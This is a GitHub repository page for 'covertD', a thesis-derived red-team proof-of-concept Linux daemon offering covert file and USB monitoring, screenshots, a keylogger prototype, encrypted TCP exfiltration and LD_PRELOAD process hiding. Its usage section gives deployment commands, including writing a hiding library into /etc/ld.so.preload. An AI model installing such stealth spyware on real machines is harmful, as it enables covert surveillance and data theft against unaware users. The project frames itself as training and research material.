Skip to content
/ covertd Public

Covert Linux daemon for encrypted file logging, USB tracking, screenshots, and stealth exfiltration

License

Apache-2.0 license
2 stars 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

Simpuar/covertd

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
processhider
processhider
 
 
LICENSE
LICENSE
 
 
Makefile
Makefile
 
 
README.md
README.md
 
 
coretask.sh
coretask.sh
 
 
decrypt.c
decrypt.c
 
 
main.c
main.c
 
 
screenshot-decryptor.c
screenshot-decryptor.c
 
 
server.c
server.c
 
 

Repository files navigation

covertD

   ___   ___         __  __  _____  ___ 
  / __\ /___\/\   /\/__\/__\/__   \/   \
 / /   //  //\ \ / /_\ / \//  / /\/ /\ /
/ /___/ \_//  \ V //__/ _  \ / / / /_// 
\____/\___/    \_/\__/\/ \_/ \/ /___,'

Build License Platform

Stealth File Activity Monitor for Linux

A Red Team–oriented proof-of-concept for covert file monitoring and data exfiltration on Linux systems. Developed as a Bachelor's thesis project to explore stealth persistence, forensic evasion, and covert telemetry in secure environments.

🔍 Features

  • Real-time file monitoring using inotify
  • USB device detection via libudev
  • AES-encrypted log exfiltration via TCP
  • Screenshot capture on active window change (libX11)
  • Optional ARP signaling for covert communication
  • LD_PRELOAD-based stealth (hiding from /proc, readdir interception)
  • Deployable via systemd service
  • Keylogging module prototype (non-default)

🧪 Security & Compliance

  • Static and dynamic code analysis performed (Clang Analyzer, Valgrind)
  • Manually audited against CWE and logic bugs
  • Complies with Class 3 FSTEC standards for absence of undocumented features

🧩 Why This Tool?

System USB Detection Keystroke Logging Data Exfiltration Process Hiding Screenshots
Auditd
inotify-tools
Auditbeat
Sysdig
SprutMonitor (Win only)
covertD (this) ✅ (prototype) ✅ (AES over TCP) ✅ (LD_PRELOAD)

⚙️ Dependencies

Install required libraries (Debian/Ubuntu/Kali):

sudo apt update
sudo apt install libssl-dev libudev-dev libpcap-dev libx11-dev libnet1-dev

🛠 Build

make all

This builds:

  • coretaskd — file monitoring daemon
  • server — log receiver and decryptor
  • screenshot-decryptor — optional PoC for visual log parsing

🚀 Usage

1. Deploy systemd service

cp coretaskd /usr/local/bin/
cp coretaskd.service /etc/systemd/system/
systemctl daemon-reexec
systemctl enable coretaskd
systemctl start coretaskd

2. Start receiver

./server 9999

3. (Optional) Enable process hiding

cd processhider
make
echo /full/path/to/libprocesshider.so >> /etc/ld.so.preload

📁 Project Structure

  • main.c – file and USB monitor
  • server.c / decrypt.c – listener with AES decryption
  • coretask.sh – deployment helper script
  • processhider/ – LD_PRELOAD stealth library
  • screenshot-decryptor.c – GUI window watcher and screenshot handler

✅ Tested On

  • Astra Linux SE
  • Ubuntu 22.04

📈 Future Improvements

  • Wayland screenshot capture
  • Cross-platform builds (Windows, macOS)
  • Kernel-level rootkit integration
  • Real-time USB block & alerting

⚠ Disclaimer

Educational use only. Do not deploy without explicit authorization.

🧠 Thesis Origin

Originally developed as part of a Bachelor's thesis focused on secure file telemetry and stealth persistence mechanisms in hardened Linux environments. Designed for use in Red Team training, malware research, and threat simulation labs.

About

Covert Linux daemon for encrypted file logging, USB tracking, screenshots, and stealth exfiltration

Topics

c linux security-audit research systemd forensics malware-analysis file-monitoring red-team ld-preload data-exfiltration security-tools covert screenshot-capture usb-tracker

Resources

Readme

License

Apache-2.0 license
Activity

Stars

2 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages